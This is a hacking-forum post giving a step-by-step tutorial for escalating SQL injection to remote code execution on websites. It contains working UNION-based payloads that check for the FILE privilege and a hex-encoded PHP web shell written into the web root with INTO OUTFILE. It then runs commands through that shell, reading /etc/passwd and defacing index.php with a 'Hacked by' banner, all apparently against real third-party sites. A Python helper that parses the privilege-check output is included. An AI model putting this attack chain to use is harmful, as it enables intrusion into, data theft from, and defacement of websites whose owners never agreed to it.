Sql Injection To RCE! Excellent topic | General Hacking | Crax

Posted by gkgrsnkzlcksn (Member, joined Dec 11, 2022)
Hello my friends, I hope you are well. In the previous post I covered 'SQL injection to LFI'; today I will cover 'SQL injection to RCE'. The idea is actually very simple, and I will keep the explanation simple so as not to confuse you.

First of all, we need a website that has a 'SQL injection' vulnerability.



Work the injection up to the 'UNION ALL SELECT' stage, where the numbers you select are reflected back on the page.

Follow the steps from here. On the site I am using for this walkthrough, the value '6' is reflected.

That means column '6' is the one we will work with from now on.

Move the mouse over the '6', click on it, and it will be highlighted in blue.



Then repeat the steps I followed.

Hover over the '6', delete it and paste the following query in its place.

Code : (SELECT+GROUP_CONCAT(GRANTEE,0x202d3e20,IS_GRANTABLE,0x3c62723e)+FROM+INFORMATION_SCHEMA.USER_PRIVILEGES)

Or ..

Code 2 : CONCAT(0x44617461646972203a,@@datadir,0x3c62723e43757272656e742055736572203a,user(),0x3c62723e3c68723e,(SELECT+GROUP_CONCAT(user,0x3a,file_priv+SEPARATOR+0x3c62723e)+FROM+mysql.user))

The hex literals are only labels and separators, used so that no quotes are needed in the injected query: 0x202d3e20 is ' -> ', 0x3c62723e is '<br>', 0x3a is ':', 0x44617461646972203a is 'Datadir :', 0x3c62723e43757272656e742055736572203a is '<br>Current User :' and 0x3c62723e3c68723e is '<br><hr>'. Note that Code 2 reads mysql.user, which needs SELECT on the mysql database, so it can fail for a low-privileged application account even when Code 1 works.

After pasting, a screen like this will appear. If you do not see text like the one below, the result looks like this:



"'root'@'localhost' -> YES": this tells us that the IS_GRANTABLE column is YES, meaning the account holds its privileges WITH GRANT OPTION. Code 1 prints one line per privilege row, so a wall of YES lines is typical of root. What actually matters for this technique is the FILE privilege, which Code 2 shows directly as file_priv ('Y' or 'N') for each account in mysql.user; the account the web application connects as (the value of user()) is the one that needs a 'Y'.

But if you see "'root'@'localhost' -> NO" (or file_priv 'N' for the current account), these permissions are disabled. As I said, this does not work on every website; it is the exception rather than the rule.

With the FILE privilege we get two capabilities, which is what I mean by "read, write, print" being open:

Reading: we can read files that we should not be able to see, using LOAD_FILE(). This is the same thing exploited in the previous post under the name 'LFI'.

Writing, printing: 'writing' here means creating a file whose content we choose, using SELECT ... INTO OUTFILE. Imagine what that allows: we can embed not just text but the commands we want into a file of our choosing. The file is written by the MySQL server process, so the target directory must be writable by the mysqld OS user, the database must be on the same host as the web server, and on MySQL 5.7 and later the secure_file_priv setting often restricts or disables INTO OUTFILE entirely. If we can drop a PHP file into the web root, the commands in it run.
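The two privilege checks above return a single GROUP_CONCAT string with HTML separators spliced in. As an added example that is not part of the original post, the following Python decodes the hex literals used in Code 1 and Code 2 and parses the strings they produce, so you can tell mechanically whether the account the application connects with has FILE. The two sample responses are constructed for the example, not captured from any real target; the `current_user_has_file` rule (matching `user()` to mysql.user by user name only) is a simplification.

```python
# Added example (not from the original post): decode the hex literals in the two
# privilege-check injections and parse the GROUP_CONCAT output they return.
# SAMPLE_CODE1 / SAMPLE_CODE2 are constructed responses, not real target output.

def decode_hex_literal(lit: str) -> str:
    """Turn a MySQL 0x... literal into the text it stands for."""
    if not lit.startswith("0x"):
        raise ValueError("not a hex literal: " + lit)
    return bytes.fromhex(lit[2:]).decode("utf-8")


# The separators and labels both payloads splice into the page.
ARROW = decode_hex_literal("0x202d3e20")                                  # " -> "
BR = decode_hex_literal("0x3c62723e")                                     # "<br>"
DATADIR_LABEL = decode_hex_literal("0x44617461646972203a")                # "Datadir :"
USER_LABEL = decode_hex_literal("0x3c62723e43757272656e742055736572203a")  # "<br>Current User :"
HR = decode_hex_literal("0x3c62723e3c68723e")                             # "<br><hr>"


def parse_user_privileges(resp: str) -> list:
    """Code 1 output: one 'GRANTEE -> IS_GRANTABLE' entry per privilege row of
    INFORMATION_SCHEMA.USER_PRIVILEGES. IS_GRANTABLE only says whether the row's
    privilege was granted WITH GRANT OPTION; it does not name the privilege."""
    rows = []
    for chunk in resp.split(BR):
        if ARROW in chunk:
            grantee, grantable = chunk.split(ARROW, 1)
            rows.append((grantee.strip(), grantable.strip()))
    return rows


def parse_code2(resp: str) -> dict:
    """Code 2 output: 'Datadir :<dir><br>Current User :<user@host><br><hr>user:file_priv<br>...'"""
    head, _, body = resp.partition(HR)
    datadir_part, _, user_part = head.partition(USER_LABEL)
    file_priv = {}
    for chunk in body.split(BR):
        if ":" in chunk:
            user, priv = chunk.split(":", 1)
            file_priv[user.strip()] = priv.strip()
    return {
        "datadir": datadir_part.replace(DATADIR_LABEL, "", 1),
        "current_user": user_part,
        "file_priv": file_priv,
    }


def current_user_has_file(parsed: dict) -> bool:
    """True when the account the application connects as has FILE ('Y').
    user() returns 'user@host'; mysql.user is keyed by user and host, and this
    simplification matches on the user part only."""
    name = parsed["current_user"].split("@", 1)[0]
    return parsed["file_priv"].get(name) == "Y"


SAMPLE_CODE1 = (  # constructed
    "'root'@'localhost' -> YES<br>'root'@'localhost' -> YES<br>"
    "'web'@'localhost' -> NO"
)
SAMPLE_CODE2 = (  # constructed
    "Datadir :/var/lib/mysql/<br>Current User :web@localhost<br><hr>"
    "root:Y<br>web:Y<br>readonly:N"
)

if __name__ == "__main__":
    print(parse_user_privileges(SAMPLE_CODE1))
    info = parse_code2(SAMPLE_CODE2)
    print(info)
    print("FILE privilege usable by current account:", current_user_has_file(info))
```

The point of separating the two parsers is that Code 1 alone cannot confirm FILE; only the file_priv column from Code 2 (or a PRIVILEGE_TYPE = 'FILE' row, which Code 1 does not select) answers that question.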

I hope the logic is clear; it is simple enough.

Now all that remains is a very simple step: finding the directory path. Every website has a filesystem directory behind it. The first way to find it is to provoke an error: put a quote into a parameter of the indexed page and the resulting SQL error may print the full path of the script.



You can see that when I put a quotation mark on a random site, it returned its directory in an error message. Whether this works is a matter of luck.

Directory: "D:\Apache24\htdocs\home\backend\class\class_db.php"

This is the directory address. Once you have it, you need to trim it back to the web root before the 'print' (file write) step. The web root is the 'home directory' of the site: on a Linux server it typically ends at 'public_html', on a Windows server at 'htdocs'.

These are the main directories. If that is not clear, here is another way to look at it. Since your targets will mainly be 'Linux' systems, I will show it that way.

Take 'www.google.com/ahmet/polis/baskını/yedi/geçmisolsun.php'. What is the main directory of that site? It is the one that serves 'www.google.com/burasinin.php' directly. If the site is Linux, that directory is 'public_html', and the URL segments after it map onto subdirectories of it.

Let's trim our directory. The path of my current target is as follows.

"/home/censorship/public_html/censorship/db.class.php" trimmed back to the web root gives "/home/censorship/public_html/"

Yes, the trimming is done; the only thing left is the following.

Delete the query we put in our '6' column, then find a web shell somewhere on the internet or use the one-liner below directly.

Code: <?php echo system($_GET['sex']); ?>

(system() already prints the command output; the echo only repeats the last line and does no harm.)

Now paste this code into the '6' column reflected below. It should look like this.



Yes, we pasted it; everything is fine. Now select the whole shell in the '6' column so it is highlighted in blue.



There is a '0xHEX' button below; click it while the code is selected.



Yes, our code is now 'hex'. I am sharing it below for anyone who does not want to bother. Hex-encoding the shell means the injected query contains no quotes at all.

Code: 0x3c3f706870206563686f2073797374656d28245f4745545b27736578275d293b203f3e

Now all I have to do is put our own directory address into the command below.

Code: +INTO+OUTFILE+'/var/www/html/pescyte.php'

Yes, the directory is in there; now we replace it with our own.

Before : +INTO+OUTFILE+'/var/www/html/pescyte.php'

After : +INTO+OUTFILE+'/home/censorship/public_html/sex.php'

Something will catch your eye: our directory ended at public_html, so why did I add 'sex.php'? INTO OUTFILE creates a new file and writes the selected data into it, so the path has to name that file, not just the directory.

That is why it says 'sex.php' there; you could call it 'illegal.php' instead, it is a matter of preference. The file must not already exist, because INTO OUTFILE refuses to overwrite an existing file.

Now all we have to do is follow the step below.



As you can see, I pasted our 'After' code right before the "--+" at the end of the query, so the statement ends with ... INTO OUTFILE '/home/censorship/public_html/sex.php' --+.

All we have to do now is click 'Execute' and then look at the results together.



Yes, our file is there; from here we drive it by passing commands in the URL.



Yes, I ran our 'ls' command and the files in the directory we are in were listed.



Yes, I typed 'cat /etc/passwd' and it read 'passwd' and displayed it.

This time I wrote the following command in the URL.

Code : echo "<center><h1>Hacked by P30w4ll & BeyaZ / #İllegalPlatform.Co Education Index</h1></center>" > index.php

As soon as I submit it, this text will appear on the home page; let's see.



Yes, the text appeared, and we uploaded a shell with a simple method without ever entering the admin panel.

I hope you liked it; please comment. If I do not get many likes and comments, I will stop posting topics for a while.